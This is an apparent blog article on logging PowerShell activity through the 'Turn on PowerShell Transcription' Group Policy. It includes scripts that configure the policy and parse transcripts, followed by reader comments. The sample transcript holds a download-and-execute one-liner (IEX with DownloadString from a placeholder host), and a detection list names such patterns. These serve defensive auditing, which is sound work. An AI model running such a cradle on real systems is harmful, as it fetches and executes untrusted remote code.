Have you ever wanted to track or log PowerShell usage on a given computer? The need comes up sooner or later, whether for troubleshooting or for an investigation. This article shows how to do it on a Windows 10 computer. The approach relies on PowerShell v5 (currently in preview), which ships with Windows 10 by default; on other operating systems you first need to upgrade to PowerShell v5 (Windows Management Framework 5.0).
Recording the commands, scripts, and cmdlets executed in a PowerShell window is nothing new: the Start-Transcript cmdlet writes them to a text file. But it has to be run manually in every PowerShell session, so the method is session-based and nothing is logged until someone starts it, which a user who would rather not be observed simply won't do. A plain transcript also carries no per-command timestamps, so you cannot tell when a particular command was run.
To close these gaps, a Group Policy setting was introduced with PowerShell v5. It tracks PowerShell usage without anyone having to run Start-Transcript. Let's look at the policy and the output it produces.
The setting is called Turn on PowerShell Transcription. It exists under both User Configuration and Computer Configuration; configure whichever fits your requirements and the GPOs already in place in your organization. The full paths are below. If both are configured, the Computer Configuration setting takes precedence.
Computer Policy: Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Transcription
User Policy: User Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Transcription
You can create a domain-level Group Policy or modify the Local Group Policy to configure this setting on a computer that is running Windows 10.
The screenshot below shows the policy. It is Not Configured by default; you must enable it to get any logging. Transcript output directory and Include invocation headers are optional.
Turn on PowerShell Transcription
When the policy is enabled and no output directory is specified, transcripts are written to the user's Documents folder, in a subfolder named after the date (YYYYMMDD), with one text file per session. A transcript looks like the output below. Its header records the user name, the RunAs User (which differs from the user name under impersonation), the process ID, the start time, and version details.
PowerShell logging
If you want the files somewhere else, set the Transcript output directory option in the Group Policy to a literal path. Do not use environment variables such as %temp%; they will not work. Keep in mind that the default location, and any directory the user can freely write to, is also one the user can edit or delete transcripts in. For evidence you intend to rely on, point the policy at a location where users can create files but not read or remove existing ones, for example a central share with write-only permissions, and collect the files from there.
If you want a timestamp for each command executed through PowerShell, select the Include invocation headers check box in the Group Policy. Each command is then preceded by a header with the date and time at which it was run. With this option enabled, the output looks similar to the following.
Invocation headers included
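The following script is added here as a worked example; it is not part of the original article. It applies the three settings of the policy above through the registry values the GPO writes (HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription with the values EnableTranscripting, EnableInvocationHeader and OutputDirectory), restricts the output directory so that users can add transcripts but not read or delete existing ones, reports the effective policy, and checks that a new session actually leaves a transcript behind. The directory C:\PSTranscripts is an assumption; a central share is the better choice in production.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original article): configure PowerShell v5
# transcription via the registry values behind "Turn on PowerShell Transcription".
# C:\PSTranscripts is an assumed path; any literal path works, %variables% do not.

$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
$outputDir = 'C:\PSTranscripts'

# 1. Policy values (Computer Configuration). The User Configuration
#    equivalent lives under HKCU with the same key path and value names.
if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
Set-ItemProperty -Path $policyKey -Name EnableTranscripting    -Value 1 -Type DWord           # Enabled
Set-ItemProperty -Path $policyKey -Name EnableInvocationHeader -Value 1 -Type DWord           # Include invocation headers
Set-ItemProperty -Path $policyKey -Name OutputDirectory        -Value $outputDir -Type String  # Transcript output directory

# 2. Output directory: the engine creates the YYYYMMDD subfolder and the
#    transcript file as the logged-on user, so Users need to be able to create
#    files and folders and write to them, but not to list, read or delete.
#    (The creating user still owns the file; for real tamper resistance,
#    collect the transcripts to a system the user cannot reach.)
if (-not (Test-Path $outputDir)) { New-Item -ItemType Directory -Path $outputDir | Out-Null }
$acl = Get-Acl -Path $outputDir
$acl.SetAccessRuleProtection($true, $false)        # stop inheriting, drop inherited ACEs
$inherit = 'ContainerInherit,ObjectInherit'
foreach ($rule in @(
        @('NT AUTHORITY\SYSTEM',    'FullControl'),
        @('BUILTIN\Administrators', 'FullControl'),
        @('BUILTIN\Users',          'Write,ReadAttributes,Synchronize'))) {
    $ace = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule `
                      -ArgumentList $rule[0], $rule[1], $inherit, 'None', 'Allow'
    $acl.AddAccessRule($ace)
}
Set-Acl -Path $outputDir -AclObject $acl

# 3. Report the effective setting: a configured Computer policy (HKLM)
#    takes precedence over a User policy (HKCU).
function Get-TranscriptPolicy {
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription"
        $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if ($p -and $null -ne $p.EnableTranscripting) {
            return [pscustomobject]@{
                Scope            = $hive
                Enabled          = [bool]$p.EnableTranscripting
                OutputDirectory  = $p.OutputDirectory      # empty means the Documents folder
                InvocationHeader = [bool]$p.EnableInvocationHeader
            }
        }
    }
    [pscustomobject]@{ Scope = 'none'; Enabled = $false; OutputDirectory = $null; InvocationHeader = $false }
}
Get-TranscriptPolicy

# 4. Verify: a fresh PowerShell process reads the policy at startup, so it
#    should leave a transcript under today's folder without a gpupdate.
Start-Process -FilePath powershell.exe -ArgumentList '-NoProfile', '-Command', 'Get-Date' `
              -Wait -WindowStyle Hidden
$today = Join-Path $outputDir (Get-Date -Format 'yyyyMMdd')
Get-ChildItem -Path $today -Filter 'PowerShell_transcript*.txt' |
    Select-Object Name, Length, LastWriteTime
```

Step 4 is the check worth keeping around: if no PowerShell_transcript*.txt file shows up in the date folder after the child process exits, either the registry values did not take or the directory ACL denies the write, and nothing else on the machine will tell you.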
All the policy does is start a transcript, the same mechanism Start-Transcript uses, whenever a new PowerShell session is launched. It is completely transparent to the user; nothing indicates that the session is being recorded. It covers not only the PowerShell console and the ISE but also PowerShell runspaces created from a C# program, so pretty much anything executed by the Windows PowerShell engine can be tracked.
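Once transcripts are being written, someone has to read them. The function below is added here as an example and is not from the article: it parses a transcript into the session header fields listed above (user name, RunAs User, process ID, start time) plus the list of commands with the timestamps that invocation headers supply, then flags commands that match a few patterns worth a second look. The transcript text is constructed to mirror the layout of the article's screenshots; real files may contain extra header lines, which the parser ignores, and the prompt regex assumes the default `PS path>` prompt.

```powershell
# Added example (not from the original article): triage a transcript produced
# by the transcription policy with invocation headers enabled.
# The transcript below is constructed sample input, not a real capture.
$sampleTranscript = @'
**********************
Windows PowerShell transcript start
Start time: 20151016101522
Username: CONTOSO\jdoe
RunAs User: CONTOSO\jdoe
Machine: WS01 (Microsoft Windows NT 10.0.10240.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 4712
PSVersion: 5.0.10240.16384
**********************
**********************
Command start time: 20151016101530
**********************
PS C:\Users\jdoe> Get-Process | Select-Object -First 1

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    133      10     1844       7864       0.05   3228   1 conhost
**********************
Command start time: 20151016101601
**********************
PS C:\Users\jdoe> IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')
**********************
Windows PowerShell transcript end
End time: 20151016101610
**********************
'@

function ConvertFrom-PSTranscript {
    param([Parameter(Mandatory)][string]$Text)

    $header      = @{}
    $commands    = @()
    $pendingTime = $null          # timestamp from the last invocation header

    foreach ($line in ($Text -split "`r?`n")) {
        if ($line -match '^(Username|RunAs User|Machine|Process ID|Start time|Host Application|PSVersion): (.+)$') {
            $header[$matches[1]] = $matches[2].Trim()
        }
        elseif ($line -match '^Command start time: (\d{14})$') {
            $pendingTime = [datetime]::ParseExact($matches[1], 'yyyyMMddHHmmss', $null)
        }
        elseif ($line -match '^PS [^>]*> (.+)$') {
            # Default prompt line: everything after "PS <path>> " is the command.
            $commands += [pscustomobject]@{ Time = $pendingTime; Command = $matches[1] }
            $pendingTime = $null
        }
    }

    [pscustomobject]@{
        Username     = $header['Username']
        RunAsUser    = $header['RunAs User']
        Impersonated = ($header['Username'] -ne $header['RunAs User'])
        Machine      = $header['Machine']
        ProcessId    = [int]$header['Process ID']
        StartTime    = [datetime]::ParseExact($header['Start time'], 'yyyyMMddHHmmss', $null)
        Commands     = $commands
    }
}

# Patterns commonly seen in download-and-execute or obfuscated one-liners.
# -match is case-insensitive, so "iex" and "IEX" both hit.
$suspiciousPatterns = @(
    'IEX\b|Invoke-Expression',
    'DownloadString|DownloadFile',
    '-EncodedCommand|-enc\b',
    'FromBase64String'
)

function Find-SuspiciousCommand {
    param([Parameter(Mandatory)]$Transcript)
    foreach ($c in $Transcript.Commands) {
        foreach ($p in $suspiciousPatterns) {
            if ($c.Command -match $p) {
                [pscustomobject]@{
                    Time      = $c.Time
                    User      = $Transcript.Username
                    RunAsUser = $Transcript.RunAsUser
                    ProcessId = $Transcript.ProcessId
                    Pattern   = $p
                    Command   = $c.Command
                }
                break
            }
        }
    }
}

$session = ConvertFrom-PSTranscript -Text $sampleTranscript
'{0} ran {1} command(s) as {2} in PID {3}' -f $session.Username, $session.Commands.Count, $session.RunAsUser, $session.ProcessId
Find-SuspiciousCommand -Transcript $session | Format-Table Time, User, Pattern, Command -AutoSize
```

To run this over a whole output directory, feed each file in: `Get-ChildItem $dir -Recurse -Filter 'PowerShell_transcript*.txt' | ForEach-Object { ConvertFrom-PSTranscript -Text (Get-Content $_.FullName -Raw) }`. The Impersonated flag is there because the header's Username and RunAs User differ when a session runs under another identity, which is exactly the case where you want to know who really typed the command.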
I had issues getting this to work properly when logging into the machine with a standard account and then running PowerShell as a privileged account. It would only log commands run as the account I logged into the machine with.
I think I’m missing something here… I’m looking at my GPO settings and I do not see these options under Computer Configuration > Admin Templates > Windows Components > Windows PowerShell. What I see is the following:
Turn on Module Logging
Turn on Script Execution
Set the Default source path for Update-help